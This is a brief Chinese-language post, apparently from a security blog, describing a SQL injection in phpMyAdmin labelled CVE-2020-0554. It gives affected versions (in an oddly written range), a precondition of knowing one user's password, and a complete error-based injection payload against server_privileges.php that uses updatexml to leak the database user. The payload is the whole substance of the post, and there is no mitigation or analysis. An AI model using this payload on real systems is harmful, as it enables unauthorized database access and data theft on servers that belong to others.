# CVE-2020-0554 phpMyadmin SQL注入
影响版本:
“`
4<4.9.4 and 5>5.0.1
“`
前提:已知phpMyadmin的一个用户口令
Payload:
“`
/phpMyAdmin-4.9.2-all-languages/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20–%20
“`
![p.jpg](/media/editor/p_20210720221151726708.jpg)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容